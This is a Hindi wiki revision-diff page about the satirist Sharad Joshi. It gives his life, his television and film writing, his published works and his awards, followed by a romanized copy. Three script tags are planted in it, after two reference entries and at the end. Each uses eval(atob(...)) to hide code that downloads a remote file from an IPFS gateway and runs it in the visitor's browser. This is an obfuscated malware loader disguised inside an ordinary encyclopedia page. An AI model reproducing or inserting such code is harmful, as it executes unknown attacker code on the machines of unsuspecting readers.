Difference between revisions of "शरद जोशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''शरद जोशी''' (जन्म:21 मई 1931, उज्जैन - 5 सितंबर 1991, [[मु...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 +
[[चित्र:Sharad joshi.jpg|thumb|शरद जोशी]]
 
'''शरद जोशी''' (जन्म:[[21 मई]] [[1931]], [[उज्जैन]] - [[5 सितंबर]] [[1991]], [[मुंबई]]) अपने समय के अनूठे व्यंग्य रचनाकार थे। अपने वक्त की सामाजिक, राजनीतिक और सांस्कृतिक विसंगतियों को उन्होंने अत्यंत पैनी निगाह से देखा। अपनी पैनी कलम से बड़ी साफगोई के साथ उन्हें सटीक शब्दों में व्यक्त किया। शरद जोशी पहले व्यंग्य नहीं लिखते थे, लेकिन बाद में उन्होंने अपनी आलोचना से खिन्न होकर व्यंग्य लिखना शुरू कर दिया। वह [[भारत]] के पहले व्यंग्यकार थे, जिन्होंने पहली बार [[मुंबई]] में ‘चकल्लस’ के मंच पर 1968 में गद्य पढ़ा और किसी कवि से अधिक लोकप्रिय हुए।
 
'''शरद जोशी''' (जन्म:[[21 मई]] [[1931]], [[उज्जैन]] - [[5 सितंबर]] [[1991]], [[मुंबई]]) अपने समय के अनूठे व्यंग्य रचनाकार थे। अपने वक्त की सामाजिक, राजनीतिक और सांस्कृतिक विसंगतियों को उन्होंने अत्यंत पैनी निगाह से देखा। अपनी पैनी कलम से बड़ी साफगोई के साथ उन्हें सटीक शब्दों में व्यक्त किया। शरद जोशी पहले व्यंग्य नहीं लिखते थे, लेकिन बाद में उन्होंने अपनी आलोचना से खिन्न होकर व्यंग्य लिखना शुरू कर दिया। वह [[भारत]] के पहले व्यंग्यकार थे, जिन्होंने पहली बार [[मुंबई]] में ‘चकल्लस’ के मंच पर 1968 में गद्य पढ़ा और किसी कवि से अधिक लोकप्रिय हुए।
 
==जीवन परिचय==
 
==जीवन परिचय==
शरद जोशी का जन्म [[21 मई]] [[1931]] को [[उज्जैन]] में हुआ था। क्षितिज, छोटी सी बात, साँच को आँच नहीं, गोधूलि और उत्सव फिल्में लिखने वाले शरद जोशी ने 25 साल तक कविता के मंच से गद्य पाठ किया।  
+
शरद जोशी का जन्म [[21 मई]] [[1931]] को [[उज्जैन]] में हुआ था। क्षितिज, छोटी सी बात, साँच को आँच नहीं, गोधूलि और उत्सव फिल्में लिखने वाले शरद जोशी ने 25 साल तक कविता के मंच से गद्य पाठ किया।<ref name="WDH"/>
 
====व्यक्तित्व====
 
====व्यक्तित्व====
[[बिहारी]] के दोहे की तरह शरद अपने व्यंग्य का विस्तार पाठक पर छोड़ देते हैं। एक बार शरद जोशी ने लिखा था, ‘'लिखना मेरे लिए जीवन जीने की तरकीब है। इतना लिख लेने के बाद अपने लिखे को देख मैं सिर्फ यही कह पाता हूँ कि चलो, इतने बरस जी लिया। यह न होता तो इसका क्या विकल्प होता, अब सोचना कठिन है। लेखन मेरा निजी उद्देश्य है।'<ref>{{cite web |url=http://hindi.webdunia.com/%E0%A4%B6%E0%A4%B0%E0%A4%A6-%E0%A4%9C%E0%A5%8B%E0%A4%B6%E0%A5%80-%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%80/%E0%A4%B6%E0%A4%B0%E0%A4%A6-%E0%A4%9C%E0%A5%8B%E0%A4%B6%E0%A5%80-%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%80-%E0%A4%95%E0%A5%87-%E0%A4%85%E0%A4%A8%E0%A5%82%E0%A4%A0%E0%A5%87-%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%82%E0%A4%97%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0-1100521030_1.htm |title=शरद जोशी : हिन्दी के अनूठे व्यंग्यकार |accessmonthday=5 जून |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेब दुनिया हिन्दी |language=हिन्दी }}</ref>
+
[[बिहारी]] के दोहे की तरह शरद अपने व्यंग्य का विस्तार पाठक पर छोड़ देते हैं। एक बार शरद जोशी ने लिखा था, ‘'लिखना मेरे लिए जीवन जीने की तरकीब है। इतना लिख लेने के बाद अपने लिखे को देख मैं सिर्फ यही कह पाता हूँ कि चलो, इतने बरस जी लिया। यह न होता तो इसका क्या विकल्प होता, अब सोचना कठिन है। लेखन मेरा निजी उद्देश्य है।'<ref name="WDH">{{cite web |url=http://hindi.webdunia.com/%E0%A4%B6%E0%A4%B0%E0%A4%A6-%E0%A4%9C%E0%A5%8B%E0%A4%B6%E0%A5%80-%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%80/%E0%A4%B6%E0%A4%B0%E0%A4%A6-%E0%A4%9C%E0%A5%8B%E0%A4%B6%E0%A5%80-%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%80-%E0%A4%95%E0%A5%87-%E0%A4%85%E0%A4%A8%E0%A5%82%E0%A4%A0%E0%A5%87-%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%82%E0%A4%97%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0-1100521030_1.htm |title=शरद जोशी : हिन्दी के अनूठे व्यंग्यकार |accessmonthday=5 जून |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेब दुनिया हिन्दी |language=हिन्दी }}</ref>
 
====लोकप्रियता====
 
====लोकप्रियता====
शरद जोशी के व्यंग्य में हास्य, कड़वाहट, मनोविनोद और चुटीलापन दिखाई देता है, जो उन्हें जनप्रिय और लोकप्रिय रचनाकार बनाता है। उन्होंने टेलीविजन के लिए ‘ये जो है जिंदगी’, 'विक्रम बेताल', 'सिंहासन बत्तीसी', 'वाह जनाब', 'देवी जी', 'प्याले में तूफान', 'दाने अनार के' और 'ये दुनिया गजब' की धारावाहिक लिखे। इन दिनों 'सब' चैनल पर उनकी कहानियों और व्यंग्य पर आधारित 'लापतागंज <small>शरद जोशी की कहानियों का पता</small>' बहुत पसंद किया जा रहा है।
+
शरद जोशी के व्यंग्य में हास्य, कड़वाहट, मनोविनोद और चुटीलापन दिखाई देता है, जो उन्हें जनप्रिय और लोकप्रिय रचनाकार बनाता है। उन्होंने टेलीविजन के लिए ‘ये जो है जिंदगी’, 'विक्रम बेताल', 'सिंहासन बत्तीसी', 'वाह जनाब', 'देवी जी', 'प्याले में तूफान', 'दाने अनार के' और 'ये दुनिया गजब' की धारावाहिक लिखे। इन दिनों 'सब' चैनल पर उनकी कहानियों और व्यंग्य पर आधारित 'लापतागंज शरद जोशी की कहानियों का पता' बहुत पसंद किया जा रहा है।<ref name="WDH"/>
 +
==प्रकाशित कृतियाँ==
 +
;व्यंग्य संग्रह
 +
# परिक्रमा
 +
# किसी बहाने
 +
# तिलिस्म
 +
# रहा किनारे बैठ
 +
# मेरी श्रेष्ठ व्यंग्य रचनाएँ
 +
# दूसरी सतह
 +
# हम भ्रष्टन के भ्रष्ट हमारे
 +
# यथासम्भव
 +
# जीप पर सवार इल्लियाँ।
 +
; नाटक
 +
# अंधों का हाथी
 +
# एक गधा उर्फ अलादाद खां 
 +
;फिल्म लेखन
 +
#क्षितिज
 +
#छोटी सी बात
 +
#सांच को आंच नही
 +
#गोधूलि
 +
#उत्सव
 +
;दूरदर्शन धारावहिक:
 +
#ये जो है जिन्दगी
 +
#विक्रम बेताल
 +
#सिंहासन बत्तीसी
 +
#वाह जनाब
 +
#देवी जी
 +
#प्याले में तूफान
 +
#दाने अनार के
 +
#ये दुनिया गजब की।<ref>{{cite web |url=http://www.abhivyakti-hindi.org/lekhak/s/sharad_joshi.htm |title=शरद जोशी|accessmonthday=5 जून |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=अभिव्यक्ति |language=हिन्दी }}</ref>
 +
 
 +
==सम्मान और पुरस्कार== 
 +
* चकल्लस पुरस्कार।
 +
* काका हाथरसी पुरस्कार।
 +
* श्री महाभारत हिन्दी सहित्य समिति इन्दौर द्वारा ‘सारस्वत मार्तण्ड’ की उपाधि परिवार पुरस्कार से सम्मानित।
 +
* 1990 में भारत सरकार द्वारा [[पद्मश्री]] की उपाधि से सम्मानित।
 +
 
 
==निधन==
 
==निधन==
 
[[5 सितंबर]] 1991 में [[मुंबई]] में उनका निधन हुआ।
 
[[5 सितंबर]] 1991 में [[मुंबई]] में उनका निधन हुआ।
Line 11: Line 48:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>  
 
<references/>  
 +
==बाहरी कड़ियाँ==
 +
 +
*[http://kathaakar.blogspot.in/2008/09/17.html 17वीं पुण्‍य तिथि पर शरद जोशी को याद करते हुए]
 +
*[http://agoodplace4all.com/?p=8750 “तीस साल का इतिहास” शरद जोशी]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{समकालीन कवि}}
 
{{समकालीन कवि}}

Revision as of 10:20, 5 June 2012

thumb|sharad joshi sharad joshi (janm:21 mee 1931, ujjain - 5 sitanbar 1991, muanbee) apane samay ke anoothe vyangy rachanakar the. apane vakt ki samajik, rajanitik aur saanskritik visangatiyoan ko unhoanne atyant paini nigah se dekha. apani paini kalam se b di saphagoee ke sath unhean satik shabdoan mean vyakt kiya. sharad joshi pahale vyangy nahian likhate the, lekin bad mean unhoanne apani alochana se khinn hokar vyangy likhana shuroo kar diya. vah bharat ke pahale vyangyakar the, jinhoanne pahali bar muanbee mean ‘chakallas’ ke manch par 1968 mean gady padha aur kisi kavi se adhik lokapriy hue.

jivan parichay

sharad joshi ka janm 21 mee 1931 ko ujjain mean hua tha. kshitij, chhoti si bat, saanch ko aanch nahian, godhooli aur utsav philmean likhane vale sharad joshi ne 25 sal tak kavita ke manch se gady path kiya.[1]

vyaktitv

bihari ke dohe ki tarah sharad apane vyangy ka vistar pathak par chho d dete haian. ek bar sharad joshi ne likha tha, ‘'likhana mere lie jivan jine ki tarakib hai. itana likh lene ke bad apane likhe ko dekh maian sirph yahi kah pata hooan ki chalo, itane baras ji liya. yah n hota to isaka kya vikalp hota, ab sochana kathin hai. lekhan mera niji uddeshy hai.'[1]

lokapriyata

sharad joshi ke vyangy mean hasy, k davahat, manovinod aur chutilapan dikhaee deta hai, jo unhean janapriy aur lokapriy rachanakar banata hai. unhoanne telivijan ke lie ‘ye jo hai jiandagi’, 'vikram betal', 'sianhasan battisi', 'vah janab', 'devi ji', 'pyale mean toophan', 'dane anar ke' aur 'ye duniya gajab' ki dharavahik likhe. in dinoan 'sab' chainal par unaki kahaniyoan aur vyangy par adharit 'lapataganj sharad joshi ki kahaniyoan ka pata' bahut pasand kiya ja raha hai.[1]

prakashit kritiyaan

vyangy sangrah
  1. parikrama
  2. kisi bahane
  3. tilism
  4. raha kinare baith
  5. meri shreshth vyangy rachanaean
  6. doosari satah
  7. ham bhrashtan ke bhrasht hamare
  8. yathasambhav
  9. jip par savar illiyaan.
natak
  1. aandhoan ka hathi
  2. ek gadha urph aladad khaan
philm lekhan
  1. kshitij
  2. chhoti si bat
  3. saanch ko aanch nahi
  4. godhooli
  5. utsav
dooradarshan dharavahik
  1. ye jo hai jindagi
  2. vikram betal
  3. sianhasan battisi
  4. vah janab
  5. devi ji
  6. pyale mean toophan
  7. dane anar ke
  8. ye duniya gajab ki.[2]

samman aur puraskar

  • chakallas puraskar.
  • kaka hatharasi puraskar.
  • shri mahabharat hindi sahity samiti indaur dvara ‘sarasvat martand’ ki upadhi parivar puraskar se sammanit.
  • 1990 mean bharat sarakar dvara padmashri ki upadhi se sammanit.

nidhan

5 sitanbar 1991 mean muanbee mean unaka nidhan hua.

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 sharad joshi : hindi ke anoothe vyangyakar (hindi) (ech.ti.em.el) veb duniya hindi. abhigaman tithi: 5 joon, 2012.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. sharad joshi (hindi) (ech.ti.em.el) abhivyakti. abhigaman tithi: 5 joon, 2012.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>